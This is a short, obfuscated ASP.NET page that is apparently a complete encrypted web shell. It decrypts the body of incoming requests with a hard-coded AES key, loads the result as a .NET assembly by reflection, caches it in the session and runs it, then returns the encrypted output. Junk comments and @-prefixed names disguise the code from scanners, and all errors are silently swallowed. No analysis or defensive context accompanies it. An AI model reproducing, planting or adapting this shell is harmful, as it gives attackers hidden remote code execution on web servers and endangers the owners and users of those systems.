<%try{string key = "9e94b15ed312fa42";byte[] fileData = @Context.@Request.@BinaryRead(Context.Request.ContentLength);byte[] K5a6HhJ = @System.@Text.@Encoding.@Default.@GetBytes(key);byte[] data = new @System.@Security.@Cryptography.@RijndaelManaged()./*Z59Kyi47xK*/@CreateDecryptor(K5a6HhJ, K5a6HhJ).@TransformFinalBlock(fileData, 0, Context.Request.ContentLength);if (Context.Session["payload"] == null){ Context.Session["payload"] = (@System.@Reflection.@Assembly)typeof(@System.@Reflection.@Assembly).GetMethod("Load", new @System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });}else{ object o = ((@System.@Reflection.@Assembly)Context.Session["payload"]).@CreateInstance("LY"); System.IO.MemoryStream outStream = new @System.@IO.@MemoryStream();o.Equals(/*Z59Kyi47xK*/outStream);o.Equals(/*Z59Kyi47xK*/Context); o.Equals(/*Z59Kyi47xK*/data);o.ToString();byte[] r = outStream.ToArray();outStream.Dispose();@Context.@Response.@BinaryWrite(new @System.@Security.@Cryptography.@RijndaelManaged()./*Z59Kyi47xK*/@CreateEncryptor(K5a6HhJ, K5a6HhJ).@TransformFinalBlock(r, 0, r.Length));}}catch(System.Exception){}%><%@ Page Language="CS"%>